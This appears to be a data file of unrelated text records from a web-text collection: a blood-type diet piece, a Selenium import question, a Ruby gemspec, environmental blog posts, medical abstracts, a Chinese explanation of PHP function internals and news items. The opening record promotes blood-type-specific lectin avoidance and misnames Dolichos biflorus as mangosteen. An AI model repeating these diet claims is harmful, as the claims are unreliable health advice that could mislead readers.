As mentioned earlier, lectins can be blood group specific-that is, able to agglutinate the cells of one ABO type but not those of another. Lima bean lectin agglutinates cells of human group A but not those O or B. The seeds of Lotus tetragonolobus (asparagus-pea) can agglutinate group O specifically, andBandeiraea simplicifolia can agglutinate group B. The specificity of lectins is so sharply defined that they can even differentiate among blood subgroups. In fact, until Dolichos biflorens (mangosteen) lectin was shown to react more vigorously with some A cells than others, we did not know that there were two varieties of A: A1 and A2. Other blood groups can be distinguished by lectins, such as M and N types, and lectins can help distinguish secretor status.
The following chart highlights the foods that contain lectins specific to each blood type, which should be avoided.
Blood Group Diet
Lectins have an effect on bodily systems such as your digestion, joint health, immune system and metabolism. Following an individualized diet such as the Blood Type Diet, the GenoType Diet, or a personalized SWAMI Diet provides optimal lectin-blocking nutrition and offers protection against the negative effects of dietary lectins.
Disclaimer: The content is purely informative and educational in nature and should not be construed as medical advice. Please use the content only in consultation with an appropriate certified medical or healthcare professional.
Dr. Peter D’Adamo is a naturopathic physician and the author of the NY Times best seller, Eat Right 4 Your Type, which advanced the idea that blood types play a vital role in optimal health and well-being. Dr. D’Adamo is the founder of the Center of Excellence in Generative Medicine at the University of Bridgeport in CT, and he serves as a Distinguished Professor of Clinical Studies at the University of Bridgeport College of Naturopathic Medicine.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Unable to launch Selenium with Python in Eclipse
I'm getting Unresolved import: webdriver
Found at: selenium.webdriver.__init__
2.44.0 issue when i'm trying to launch selenium with python in Eclipse
My sample code
from selenium import webdriver
from selenium.common.keys import Keys
driver = webdriver.Firefox()
driver.get("http://www.python.org")
driver.close()
Using Python 2.7 , Pydev 2.2
Installed Selenium through PIP
pip install selenium
Downloading/unpacking selenium
Running setup.py (path:c:\users\ajay_t~1\appdata\local\temp\pip_build_ajay_talpur\selenium\setup.py) egg_info for package selenium
Installing collected packages: selenium
Running setup.py install for selenium
Successfully installed selenium
When updating Packages
pip install -U selenium
Requirement already up-to-date: selenium in c:\python27\lib\site-packages
What else i missed please tell me so that i can start executions.
A:
Please update Environment variable by adding Python Directory path & site packages path.And retry : C:\Python27\Scripts;C:\Python27\Lib\site-packages;
|
{
"pile_set_name": "StackExchange"
}
|
# frozen_string_literal: true
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'interferon/version'
Gem::Specification.new do |gem|
gem.name = 'interferon'
gem.version = Interferon::VERSION.dup
gem.authors = ['Igor Serebryany', 'Jimmy Ngo']
gem.email = ['igor.serebryany@airbnb.com', 'jimmy.ngo@airbnb.com']
gem.description = %(: Store metrics alerts in code!)
gem.summary = %(: Store metrics alerts in code!)
gem.homepage = 'https://www.github.com/airbnb/interferon'
gem.licenses = ['MIT']
gem.files = `git ls-files`.split($INPUT_RECORD_SEPARATOR)
gem.executables = gem.files.grep(%r{^bin/}).map { |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.add_runtime_dependency 'aws-sdk', '~> 1.35', '>= 1.35.1'
gem.add_runtime_dependency 'diffy', '~> 3.1.0', '>= 3.1.0'
gem.add_runtime_dependency 'dogapi', '~> 1.27', '>= 1.27.0'
gem.add_runtime_dependency 'dogstatsd-ruby', '~> 1.4', '>= 1.4.1'
gem.add_runtime_dependency 'nokogiri', '~> 1.8', '>= 1.8.2'
gem.add_runtime_dependency 'parallel', '~> 1.9', '>= 1.9.0'
gem.add_runtime_dependency 'psych', '~> 2.0'
gem.add_runtime_dependency 'tzinfo', '~> 1.2.2', '>= 1.2.2'
gem.add_development_dependency 'pry', '~> 0.10'
gem.add_development_dependency 'rspec', '~> 3.2'
gem.add_development_dependency 'rubocop', '~> 0.56.0'
end
|
{
"pile_set_name": "Github"
}
|
A hearse driver and funeral director made a pit stop, leaving the body and coffin of the veteran they were transporting in the hearse. They were on their way to a funeral service and left the hearse waiting in the parking lot while they took a coffee break. Both employees were fired for this thoughtless and disrespectful move when it was brought to the attention of Veterans Funeral Care, the funeral home they were working for.
|
{
"pile_set_name": "Pile-CC"
}
|
Twenty-five years after McDonald’s, working with the Environmental Defense Fund, agreed to get rid of foam clamshells for its burger–in what is now called the first corporate environmental partnership–the problem of wasteful, polluting, throwaway packaging is, if not worse than ever, no better.
With industry leaders like McDonald’s, Starbucks, PepsiCo and Coca-Cola have invested in more sustainable packaging, others have failed to follow. This is the conclusion of a thorough packaging study released last week by As You Sow and the Natural Resources Defense Council that I covered for the Guardian.
Here’s how my story begins:
Big brands, including Burger King, Dunkin Donuts, KFC, Kraft Foods and MillerCoors, are wasting billions of dollars worth of valuable materials because they sell food and drinks in subpar packaging, according to a comprehensive new report on packaging and recycling by the fast food, beverage, consumer goods and grocery industries.
The 62-page rank-‘em-and-spank-‘em study, Waste and Opportunity 2015, was published Thursday by advocacy nonprofits As You Sow and the Natural Resources Defense Council. They found that few companies have robust sustainable packaging policies or system-wide programs to recycle packages. Indeed, no company was awarded their highest rating of “best practices.”
The environmental groups did identify a number of leaders, albeit flawed ones. In the beverage industry, New Belgium Brewing, Coca-Cola, Nestlé Waters and PepsiCo won praise. Starbucks and McDonald’s are said to be a cut above their competitors in fast food and quick-serve restaurants. As for consumer goods companies and grocery stores, the report offers qualified praise for Walmart, Procter & Gamble, Colgate-Palmolive and Unilever.
Broadly, though, this study paints a discouraging picture. What progress has been made is incremental and spotty, not comprehensive. As often than not, single-use packages of food and drinks are made from virgin materials and then tossed in the trash.
As the report notes, with an overall recycling rate of 34.5% and an estimated packaging recycling rate of 51%, the United States lags behind many other developed countries. Less than 14% of plastic packaging — the fastest-growing form of packaging — is recycled. Recyclable post-consumer packaging with an estimated market value of $11.4bn is wasted annually.
The interesting question is, what have we learned from NGO and government efforts to curb packaging waste and pollution? I’m not quite ready to give up on voluntary corporate efforts–not yet, anyway. Walmart reduced packaging across its global supply chain by 5 percent between 2006 and 2013; that’s a big deal. It’s now pushing suppliers to use more recycled content.
An alternative approach is increased government regulations–deposit bills on bottles and, more recently, plastic bag bans and taxes. (New York City has just banned polystyrene packaging, joining 100 other jurisdictions, reports Mark Bittman.) But these are also halfway measures.
Bolder would be an economy-wide effort to impose Extended Producer Responsibility (EPR) rules, which are in place in much of the EU. I don’t know enough about how these work and what they cost to have an informed opinion.
I did buy a set of headphones for my iPhone the other day and had the hardest time getting them out of the ridiculous plastic package. Surely a company that’s as good at design as Apple can do better. But what’s the incentive for them to do so? Saving a few pennies from a $29.95 (!) set of headphones clearly isn’t enough.
The renewable energy and clean tech industries let loose a collective sigh of relief today. President Obama’s re-election means they still have a friend in the White House.
“Clean energy was a big winner yesterday,” said Frances Beinecke, president of the Natural Resources Defense Council. “American voters not only re-elected a president who made green jobs a cornerstone of his first term and his campaign, they also rejected some of the shrillest champions of Big Oil and Big Coal.”
As Nick Robins, HSBC’s climate research analyst, said today:
Obama’s victory essentially protects key climate policies from repeal, particularly the regulation of carbon dioxide by the EPA, most notably in the power and auto sectors. It also offers the chance of extending the Production Tax Credit for wind energy when it expires at the end of this year.
True enough, but the today’s inefficient, hodge-podge collection of EPA rules, clean-energy subsidies and state mandates — while better than nothing — is no substitute for a rational economy-wide policy to deal with climate change.
Could this election usher in a carbon tax or cap-and-trade regulations to limit global warming pollution? That’s impossible to know, but there’s no evidence that climate action has climbed to the top of the president’s to-do list.
Obama made a passing reference to climate change in his acceptance speech, saying: “We want our children to live in an America that isn’t burdened by debt, that isn’t weakened by inequality, that isn’t threatened by the destructive power of a warming planet.”
But his all-but-absolute silence about global warming during the campaign means that he has no mandate from voters to act on the issue. Worse, he has made close to zero effort to persuade Americans that the issue matters, a failure that will surely cast a shadow over his legacy if it isn’t rectified during a second term.
To see what’s next for climate and green business after the election, I reached out to some smart people in the business world and in Washington to see what opportunities, if any, they see.
The first, and maybe the best, opening will arise when the president and the lame-duck Congress face the so-called fiscal cliff in the next 60 days. The government will need revenue to avoid painful spending cuts and tax increases, and a tax on carbon emissions could become an option. [click to continue…]
Last December, government officials, corporate executives and activists met in Durban, South Africa, for high-level climate talks. They went home with an agreement … to keep talking. Meanwhile, we’re emitting more carbon dioxide every year, and atmospheric concentrations of greenhouse gases are steadily rising. If CO2 levels were somehow to stabilize now–they won’t–the world will keep warming. The bottom line: Climate change is inevitable. The world needs to learn how to prepare for it.
Increasingly, smart businesses are starting to do just that. Utilities, the oil and gas industry, agricultural companies and insurers are building assumptions about rising temperatures and extreme weather events into their scenario planning. This is what’s being called climate adaptation or climate preparedness.
The payoff from investing in adaptation could be substantial. In 2011, insured losses in the U.S. from natural catastrophes, including tornadoes, floods and hurricanes, topped $105 billion, breaking the record of $101 billion set in 2005, the year of Hurricane Katrina, according to Munich Re, the world’s largest reinsurance firm. Some of those losses had nothing to do with climate change, but others did. [click to continue…]
Happy New Year! And good riddance to 2011, a year during which we made little or no progress on some of the issues that I care most about: climate change, the long-term federal debt, social mobility (aka the American dream), and our dysfunctional Congress. Yet I remain an optimist.
Texas drought 2011
I could write many words about our woes. Instead, I’ll try to be succinct. On the climate issue,global emissions of carbon dioxide from fossil-fuel burning jumped by the largest amount on record in 2010, we learned recently, and 2011 surely brought further increases. Concentrations of CO2 are 39% above where they were at the start of the industrial era and approaching the point when some scientists say it will be nearly impossible to contain global warming, the Guardian reports. Neither the US nor the UN moved closer to regulating CO2. In a discouraging development, Republicans Mitt Romney and Newt Gingrich backed away from their once-sensible support of greenhouse gas regulation, in what can only be seen as shameless pandering to the know-nothing wing of the Republican Party. Discouraging, too, was the Fukushima nuclear disaster, which will slow down the growth of carbon-free nuclear power. So will the failure of Solyndra. Meanwhile, the U.S. suffered massive flooding of the Mississippi and Missouri Rivers, a terrible drought in Texas, record wildfires and at least 2,941 monthly weather records that were broken by extreme events, according to the NRDC.. Coincidence? Uh, no.
Like the atmospheric concentrations of CO2, the federal budget deficit has been growing.That’s no coincidence either. We’re living beyond our means, whether by burning fossil fuels or taxpayer dollars, and sticking future generations with the cleanup bill. Just last week, the White House asked for a $1.2 trillion increase in the federal debt limit, raising it to about $16.4 trillion. According to Marketplace Radio, that amounts to about $52,000 for every American. For a typical family of four, that’s bigger than the mortgage. [click to continue…]
In the midst of the madness of black Friday, and this weekend of American consumerism run amok, come a few wise words from the outdoor retailer Patagonia.
In a full-page ad in the New York Times, the privately held company asks shoppers to think more carefully about what they purchase, and the real cost of all the things we buy.
The headline: Don’t Buy This Jacket
“We ask you to buy less and to reflect before you spend a dime on this jacket or anything else,” the company says.
The rest of the ad is worth reading, and thinking about, so I’ll copy the text here:
It’s Black Friday, the day in the year retail turns from red to black and starts to make real money. But Black Friday, and the culture of consumption it reflects, puts the economy of natural systems that support all life firmly in the red. We’re now using the resources of one-and-a-half planets on our one and only planet.
Because Patagonia wants to be in business for a good long time – and leave a world inhabitable for our kids – we want to do the opposite of every other business today. We ask you to buy less and to reflect before you spend a dime on this jacket or anything else. [click to continue…]
Technological progress is impossible to predict, but it’s safe bet that we won’t be flying solar- or wind-powered airplanes anytime soon. So the best hope of flying without emitting large volumes of greenhouse gases lies with biofuels.
This week, there’s good news on bringing biofuels in the air. Beginning Wednesday, Alaska Airlines will fly 75 commercial passenger flights in the U.S. powered in part by biofuels. “This is a historic week for aviation,” declared Alaska Air’s CEO, Bill Ayer, in a press release. Today (Nov. 7), United Airlines make the first U.S. commercial flight using an advanced biofuel made from algae, according to Reuters.
Keith Loveless, vice president of corporate and legal affairs, who oversees sustainability, told me: “These fuels will make a meaningful contribution towards reducing the aviation industry’s environmental impact, and towards reducing fuel volatility, which is an incredible problem for the airline industry.”
But–and you knew there would be a but–biofuels remain way too expensive to replace jet fuels today. That’s why Tom Vilsack, the agriculture secretary, got on the phone with me last week so that the Obama administration will do all it can to advance progress on aviation biofuels. “We are engaged right now in aggressively promoting research to determine the most efficient non-food feed crop that can be used,” he said. [click to continue…]
“Americans actually do care about their health. They don’t want their kids have to be poisoned in order for them to get a job. They value their natural heritage.”
“One should not read what’s going on the House of Representatives as an indication of where America wants to be.”
That’s Peter Lehner talking. Peter, a 52-year-old environmental lawyer, is executive director of the Natural Resources Defense Council, one of America’s most important environmental groups. The NRDC has a $95 million budget, about 400 employees and about 1.3 million members. They’re big and they represent a lot of people.
And yet the NRDC and its allies are getting nowhere in Washington.
They’re struggling to protect the EPA against unrelenting Republican attacks.
And, as Elizabeth Rosenthal wrote the other day in the Times, climate change–arguably the biggest problem facing mankind–has devolved into a non-issue. The “fading of global warming from the political agenda is a mostly American phenomenon,” she wrote.
Why?
That was the question on my mind when I met recently with Peter, who is thoughtful and smart, to talk about the politics of climate. That’s not my specialty, but I came with an idea: The green groups that try to persuade Americans that environmental protection is good for their jobs and pocketbooks–that is, that green is in our self-interest–have missed opportunities to frame the environment and especially climate as moral issues, in ways that would appeal to our higher and better selves. Put another way, the big NGOs that focus on policy are not as comfortable talking about culture and religion.
So I wondered what the NRDC had learned from the failure of cap-and-trade—the scheme to regulate greenhouse gas emissions that was rejected by Congress—and whether its leaders are rethinking their message.
It was titled “How Obama’s Green Energy Agenda is Killing Jobs.” That was before the testimony began.
No matter that chief inquisitor Darrell Issa, who now denounces clean energy subsidies, once sought a loan guarantee for Aptera, an electric car maker that wanted to set up shop in his district. Dan Burton, the No. 2 Republican on the panel, supported a federal guarantee for Abound Solar, a company in his district.
What hypocrisy.
Democrats are little better, particularly as they blather on about green jobs. Sure, when Washington subsidizes clean energy, jobs may be created. The thing is, when the government subsidize anything (oil exploration, ethanol, high fructose corn syrup, home ownership), you get more of it, and more jobs. Does this mean that market-distorting subsidies are an efficient way to create jobs? The question answers itself.
[By the way, there was some amusing back-and-forth at the hearing about what constitutes a green job. It turns out that bus drivers, whether driving they are driving hybrid buses or not, are doing “green jobs” because mass transport is greener than driving, my friend Matthew Wald reports in The Times.]
So what, if anything, can we learn from Solyndra’s failure? Should the government stop financing clean energy, as some Republicans say? Or preserve today’s subsidies, as the industry would like? [click to continue…]
So we already knew that watching too much TV dulls the mind and costs a bundle (my cable bill’s $170 a month, including Internet and phone).
Now we know, thanks to a new report from the Natural Resources Defense Council, that your super-snazzy set-top box and DVR combo that means you will never have to miss another episode of Two Men and a Baby is costing you more money, wasting energy and generating carbon emissions.
With more than 80% of Americans now subscribing to cable, the numbers, taken as a whole, grow pretty big, the NRDC says:
In 2010, the electricity required to operate all U.S. set-top boxes was equal to the annual household electricity consumption of the entire state of Maryland, resulted in 16 million metric tons of carbon dioxide emissions, and cost households more than $3 billion.
They aren’t as startling on a house-by-house basis–each box, on average, costs about $18.75 a year to operate, depending on local electricity prices. But much of that money, it turns out, is wasted. About two-thirds of the energy consumed by the set-top is used when no one is watching TV or recording programs.
In a press release, NRDC’s efficiency guru, Noah Horowitz, says:
Set-top boxes are the ultimate home energy vampires, silently sucking significant amounts of energy and money when nobody’s using them. The consumer, who pays the electric bill, deserves technologies without hidden costs.
The biggest finding from our field work was that the only way to really turn these boxes off is to unplug them — not an attractive option. For almost all the boxes we tested, hitting the power button simply dims the clock or display. For a typical DVR, instead of consuming 30 Watts when on, the box used 29 Watts, only the difference of one Watt.
The problem here, as it is with many wasteful practices in the economy, is a split incentive between the owner and the user. (Economists call this a principle-agent problem.) It’s the reason why a landlord doesn’t care how inefficient an air conditioner is if the tenant pays the bill, and why few people dining out on an open-ended expense account pay much attention to the bill. In this case, the cable operator (Comcast, Time Warner) or phone company (Verizon, AT&T) that buys the set-top box doesn’t pay the electric bill, and so they have no reason to design, build, buy or demand a more efficient box. Markets aren’t working the way they should.
Today’s guest column comes from Amanda Little (née Griscom), one of my favorite writers on energy and the environment, and it’s on a very timely topic–the greening of sports. Amanda is the author of Power Trip: The Story of America’s Love Affair With Energy, and she was a long-time columnist for Grist.org and Salon.com. Amanda has also written for Outside, the New York Times Magazine, Vanity Fair, Rolling Stone, Wired, New York, InStyle, O Magazine and the Washington Post. She is the recipient of the Jane Bagley Lehman Award for excellence in environmental journalism. Amanda’s now blogging for Forbes.com, where this column originally appeared.
Why is it timely? Because just the other day, the Philadelphia Eagles unveiled plans to install solar panels, wind turbines and a co-generation plant at Lincoln Financial Field, making the stadium quite possibly the “greenest” in the sports. The gridiron goes off the grid, you could say. And if you think sports is a sandbox, with little impact on the “real world,” think again, about, say, Jackie Robinson’s influence on the civil rights movement. If you want to change the minds of people at the grass roots, about climate or energy or recycling, there’s no better place to start than with sports.
As the San Francisco Giants celebrate their 2010 World Series triumph, they’re quietly coveting another, humbler feat—one that’s perhaps no less historic in the long run. The Giants are one of the greenest teams in professional sports, and they’re proving that sustainable practices fatten the bottom line even as they ease the burdens on the planet.
Their stadium, AT&T Park, which accommodates about 45,000 fans, runs its scoreboard on solar power, recycles and composts nearly 50 percent of its waste, sources eco-friendly napkins, containers, utensils, toilet paper and the like, and has enough efficiency features to cut the stadium’s annual energy and water bills in half. That amounts to huge savings, given that stadiums can consume as much energy as small cities.
AT&T Park: Green in more ways than one
The Giants are on the front end of a trend that’s quickly gaining traction in major league baseball and throughout the NFL and NBA. Teams are stepping up recycling and efficiency in their facilities, attracting lucrative corporate sponsorships with green messaging, and raising consciousness among fans. If the trend continues to build in the next two years, we may find that games do more to push environmental progress in the U.S. than politics.
Especially now, given the acrimony in Washington, professional sports may have a broader and more profound influence than any other single entity on American mindsets, slicing through socioeconomic and political divides. “More than 150 million Americans – half our population – regularly follow professional sports,” Allen Hershkowitz, Senior Scientist at Natural Resources Defense Council, told me. Hershkowitz founded the NRDC project greensports.org, a pro-bono consultancy that advises teams and leagues on environmental strategies.
For nearly a century, professional sports have galvanized social movements and ginned up American patriotism. Baseball, for instance, desegregated a decade before the nation did, helping catalyze the civil rights movement. Women’s basketball and softball leagues were organized before women had the right to vote. [click to continue…]
|
{
"pile_set_name": "Pile-CC"
}
|
Clinical features and therapeutic management of subglottic stenosis in patients with Wegener's granulomatosis.
The objective of the study was to evaluate the clinical features, response to treatment, and long-term outcome of subglottic stenosis (SGS) in a series of patients diagnosed as having Wegener's granulomatosis (WG) at a single institution. Subglottic stenosis developed in 6 out of 51 (11.7%) patients, in four of them in the absence of other features of active disease, and was the symptom that leads to WG diagnosis in three cases. In two cases, SGS began while the patients were receiving systemic immunosuppressive therapy for disease activity involving other sites. PR3-ANCAs were positive in four cases. An urgent tracheostomy was needed in two patients. Four patients achieved SGS clinical remission on standard treatment with glucocorticoids and cyclophosphamide, but three of them experienced repeated local relapses and required additional immunosuppressive therapy and mechanical dilations. In one case, a local relapse was successfully managed with endotracheal dilation of the stenotic segment and intralesional injection of a long-acting corticosteroid plus mechanical dilation of the stenotic segment (ILCD) without adding supplemental immunosuppressant drugs. Two patients with isolated SGS were also successfully managed with ILCD alone and did not require the institution of systemic immunosuppressive therapy. One patient underwent open surgical repair when the disease was under control. Our data suggest that Subglottic stenosis often occurs or progresses independently of other features of active WG, and that ILCD may be a safe alternative to conventional immunosuppressive therapy in patients who develop SGS in the absence of other features of active disease, allowing reducing the treatment-related toxicity.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Can automakers walk and chew gum at the same time?
That’s the challenge facing the world’s giants, from General Motors and Ford to Volkswagen, Toyota and Hyundai.
How do they invest billions of dollars and countless hours of engineering and design talent in electric and self-driving vehicles they won’t sell in meaningful numbers for years and simultaneously develop world-class cars and trucks customers will want until the mobility revolution comes, if it ever does?
GM may be showing the way, as it moves toward the goal of having electric-powered autonomous vehicles in commercial service somewhere in the United States this year and selling a wide range of EVs around the world in the near future.
GM’s approach:
Pay less attention to vehicles people don’t care about — the automaking equivalent of Elmore Leonard’s famous instruction to writers: “Try to leave out the part that readers tend to skip.” Ceasing to build slow-selling, low-profit vehicles like the Chevy Cruze and Impala frees resources for other things.
Split product development into two channels: one focused on vehicles that will be built in high numbers for the next few years, the other on vehicles and technologies that will hit their stride later
Eliminate the longstanding engine and transmission development group and make its responsibilities part of vehicle engineering, a change that looks minor from the outside, but constituted a seismic shift within GM.
“Things happen when you focus on them,” said Pam Fletcher, who led the program that created the Chevy Bolt electric car and Cadillac Super Cruise semi-autonomous driving system before assuming the new title of vice president for global innovation a few months ago.
“Our absolute intention is to commercialize these things. It’s not invention for invention’s sake. We’ve only been public about a fraction of what we’re doing.”
At the same time, human-driven cars powered by internal combustion engines accounted for 95% of the 8.4 million vehicles GM sold around the world last year. They pay the bills. GM can’t take its eye off them as it looks to the future.
“If you don’t shoot for the best, you fall behind very quickly” in hyper-competitive segments like SUVs and pickups, said Ken Morris, vice president of GM’s global product group. “We need to make money on conventional vehicles and that means we need to be a leader. That’s not going to change.”
More:Ford invests $500 million in Rivian, an electric truck startup in Michigan
More:Detroit leads, Tesla lags in trillion-dollar race for robot-car business
Combining time and talent
Moving engine and transmission development — Global Powertrain Operations in GM Speak — 20 miles from an engineering campus in Pontiac to GM’s main tech center in Warren, may look like rearranging the deck chairs, but it eliminated bureaucracy and duplication of efforts that cost time and talent, Morris said.
Combine that with the work saved by dropping slow-selling vehicles and GM can tackle new challenges like batteries, electric motors and self-driving cars. Linking software development more closely to vehicle engineering removed more bottlenecks.
While electric and autonomous vehicles are profoundly different from today’s vehicles, they share many parts and systems, Fletcher points out.
They'll “still be putting four wheels and tires on every car. Areas like chassis engineering have teams that work across the organization and portfolio. We share systems across platforms,” Fletcher said.
Ford recently made similar changes. Joe Hinrichs leads Ford’s global product development and manufacturing. Jim Farley oversees advanced technology, including autonomous vehicles. Ford’s ambitious project to create an EV and AV center in Detroit’s Corktown neighborhood is also part of the company’s approach
“The reorganizations recognize how the market has the potential to change,” IHS Markit senior analyst Stephanie Brinley said. “It’s a difficult path to walk, but one automakers must follow.”
A wait and see approach until customers demand EVs and AVs won’t do, she said. No automaker can afford to be last into the new vehicle types, but nor can any afford to ignore what buyers want today.
That dovetails with GM’s plan.
“We have a large portfolio and a large customer base,” Fletcher said. “We’re going to build a lot of kinds of vehicles for a long time.”
Contact Mark Phelan at 313-222-6731 or mmphelan@freepress.com. Follow him on Twitter @mark_phelan. Read more on autos and sign up for our autos newsletter.
|
{
"pile_set_name": "OpenWebText2"
}
|
One of the most stressful things about being a liberal blogger is having to watch as congressional Democrats stand openmouthed at the plate, watching the fastballs fly by. Steve Benen really nails it. Go read the rest:
At face value, congressional Republicans went into budget talks playing a strikingly weak hand. They're an unpopular party, pushing unpopular spending cuts, going up against a more popular president. Of the three main players -- the House, the Senate, and the White House -- the GOP controls about one-half of one-third of the relevant institutions.
And yet, who seems to be calling the shots here?
The New York Times had an interesting summary of the lay of the land, emphasizing the fact that Democrats seem to realize they let this debate slip away from them.
Both parties remain uncertain about which of them would bear the brunt of public anger if Congress cannot agree on financing federal operations for the final half of this fiscal year and government agencies shut down or drastically scale back the services they can provide. Even many Democrats believe that House Republicans have gotten the better of the antispending, antigovernment argument. But Democrats insist that is because much of the public does not appreciate the impact the Republicans' $61 billion in proposed reductions would have on spending for popular social programs if those cuts were to become law with just half of the current fiscal year remaining.
Democrats are right; most of the country has no idea the extent to which the GOP's proposed cuts would be devastating to key domestic priorities. These are cuts that, if put to a poll, the vast majority of the American mainstream would reject out of hand.
But here's another thought: maybe most of the country has no idea how brutal these cuts are because Dems haven't told them.
|
{
"pile_set_name": "OpenWebText2"
}
|
[Treatments of Soft Tissue Sarcomas by Orthopaedic Surgeons in Japan].
In Japan, the treatment of soft tissue sarcomas (STS) has been performed mainly by orthopaedic surgeons. The standard therapy for all cases of STS is surgical resection of the tumor. The prognosis of patients with unresectable tumors or distant metastases is poor despite treatment with intensive chemotherapy. Adjuvant chemotherapy is indicated for patients with resectable tumors. Round-cell STS, including extraskeletal Ewing sarcoma and rhabdomyosarcoma, have high sensitivity to chemotherapy. The standard treatment for round-cell STS is multimodal therapy with surgery and chemotherapy, with or without radiotherapy. On the other hand, non-round cell STS, including leiomyosarcoma, synovial sarcoma, and liposarcoma, have low sensitivity to chemotherapy. Thus, the standard treatment for non-round cell STS is essentially, surgery. Large and high-grade non-round cell STS are also treated using adjuvant chemotherapy along with surgery. In this review, the standard therapies for STS and the future perspective in Japan are discussed.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Requirements for antiribosomal activity of pokeweed antiviral protein.
It has been known for some time that pokeweed antiviral protein acts by enzymatically inhibiting protein synthesis on eucaryotic ribosome systems. The site of this action is known to be the ribosome itself. In this paper we show that the pokeweed antiviral protein reaction against ribosomes is a strong function of salt concentrations, where 160 mM K+ and 3 mM Mg2+ retards the reaction, while 20 mM K+ and 2 mM Mg2+ allows maximum reaction rate. It is also shown, however, that an unidentified protein in the postribosomal supernatant solution, together with ATP, allows the ribosome to be attacked even in the presence of high salt. Kinetic analysis of the antiviral protein reaction has been carried out under both sets of conditions, and reveals that the turnover number for the enzyme is about 300-400 mol/mol per min. in each case. The Km for ribosomes is 1 microM in the presence of low salt and 0.2 microM at higher salt in the presence of postribosomal supernatant factors plus ATP. The antiviral protein reaction is also shown to be pH dependent and is controlled by a residue with pKa value of approx. 7.0, apparently a histidine. Stoichiometric reaction of the enzyme with iodoacetamide results in a significant loss of antiribosomal activity.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
# 函数的定义
在PHP中,用户函数的定义从function关键字开始。如下所示简单示例:
[php]
function foo($var) {
echo $var;
}
这是一个非常简单的函数,它所实现的功能是定义一个函数,函数有一个参数,函数的内容是在标准输出端输出传递给它的参数变量的值。
函数的一切从function开始。我们从function开始函数定义的探索之旅。
**词法分析**
在 Zend/zend_language_scanner.l中我们找到如下所示的代码:
[c]
<ST_IN_SCRIPTING>"function" {
return T_FUNCTION;
}
它所表示的含义是function将会生成T_FUNCTION标记。在获取这个标记后,我们开始语法分析。
**语法分析**
在 Zend/zend_language_parser.y文件中找到函数的声明过程标记如下:
[c]
function:
T_FUNCTION { $$.u.opline_num = CG(zend_lineno); }
;
is_reference:
/* empty */ { $$.op_type = ZEND_RETURN_VAL; }
| '&' { $$.op_type = ZEND_RETURN_REF; }
;
unticked_function_declaration_statement:
function is_reference T_STRING {
zend_do_begin_function_declaration(&$1, &$3, 0, $2.op_type, NULL TSRMLS_CC); }
'(' parameter_list ')' '{' inner_statement_list '}' {
zend_do_end_function_declaration(&$1 TSRMLS_CC); }
;
>**NOTE**
>关注点在 function is_reference T_STRING,表示function关键字,是否引用,函数名。
T_FUNCTION标记只是用来定位函数的声明,表示这是一个函数,而更多的工作是与这个函数相关的东西,包括参数,返回值等。
**生成中间代码**
语法解析后,我们看到所执行编译函数为zend_do_begin_function_declaration。在 Zend/zend_complie.c文件中找到其实现如下:
[c]
void zend_do_begin_function_declaration(znode *function_token, znode *function_name,
int is_method, int return_reference, znode *fn_flags_znode TSRMLS_DC) /* {{{ */
{
...//省略
function_token->u.op_array = CG(active_op_array);
lcname = zend_str_tolower_dup(name, name_len);
orig_interactive = CG(interactive);
CG(interactive) = 0;
init_op_array(&op_array, ZEND_USER_FUNCTION, INITIAL_OP_ARRAY_SIZE TSRMLS_CC);
CG(interactive) = orig_interactive;
...//省略
if (is_method) {
...//省略 类方法 在后面的类章节介绍
} else {
zend_op *opline = get_next_op(CG(active_op_array) TSRMLS_CC);
opline->opcode = ZEND_DECLARE_FUNCTION;
opline->op1.op_type = IS_CONST;
build_runtime_defined_function_key(&opline->op1.u.constant, lcname,
name_len TSRMLS_CC);
opline->op2.op_type = IS_CONST;
opline->op2.u.constant.type = IS_STRING;
opline->op2.u.constant.value.str.val = lcname;
opline->op2.u.constant.value.str.len = name_len;
Z_SET_REFCOUNT(opline->op2.u.constant, 1);
opline->extended_value = ZEND_DECLARE_FUNCTION;
zend_hash_update(CG(function_table), opline->op1.u.constant.value.str.val,
opline->op1.u.constant.value.str.len, &op_array, sizeof(zend_op_array),
(void **) &CG(active_op_array));
}
}
/* }}} */
生成的中间代码为 **ZEND_DECLARE_FUNCTION** ,根据这个中间代码及操作数对应的op_type。
我们可以找到中间代码的执行函数为 **ZEND_DECLARE_FUNCTION_SPEC_HANDLER**。
>**NOTE**
>在生成中间代码时,可以看到已经统一了函数名全部为小写,表示函数的名称不是区分大小写的。
为验证这个实现,我们看一段代码:
[php]
function T() {
echo 1;
}
function t() {
echo 2;
}
执行代码,可以看到屏幕上输出如下报错信息:
[shell]
Fatal error: Cannot redeclare t() (previously declared in ...)
表示对于PHP来说T和t是同一个函数名。检验函数名是否重复,这个过程是在哪进行的呢?
下面将要介绍的函数声明中间代码的执行过程包含了这个检查过程。
**执行中间代码**
在 Zend/zend_vm_execute.h 文件中找到 ZEND_DECLARE_FUNCTION中间代码对应的执行函数:ZEND_DECLARE_FUNCTION_SPEC_HANDLER。
此函数只调用了函数do_bind_function。其调用代码为:
[c]
do_bind_function(EX(opline), EG(function_table), 0);
在这个函数中将EX(opline)所指向的函数添加到EG(function_table)中,并判断是否已经存在相同名字的函数,如果存在则报错。
EG(function_table)用来存放执行过程中全部的函数信息,相当于函数的注册表。
它的结构是一个HashTable,所以在do_bind_function函数中添加新的函数使用的是HashTable的操作函数**zend_hash_add**
|
{
"pile_set_name": "Github"
}
|
Chelsea to pay £6.5 million for Brazilian Lucas Piazon
According to reports in the Brazilian press, Chelsea are set to fork out £6.5 million for São Paulo forward, Lucas Piazon. The 17-year-old, who has yet to make his debut for the professionals at São Paulo, is currently on tour with Brazil’s U17s in Ecuador. The deal is set to be confirmed when he returns but Piazon will not move to Chelsea until he turns 18 in January 2012. It is believed that £5.2 million will go to São Paulo with the rest going to the player and his agent Giuliano Bertolucci.
Lucas Piazon is not to be confused with São Paulo’s other Lucas; Lucas Moura, who’ll make his debut for Brazil versus Scotland later this month
|
{
"pile_set_name": "Pile-CC"
}
|
Open University chiefs are planning significant reductions in the number of courses the institution offers and the number of lecturers it employs, the Guardian has learned.
Last June the OU, established in 1969 and the largest university in the UK, announced it needed to cut £100m from its £420m -a-year annual budget, but specific detail of where the cuts would fall was not made public.
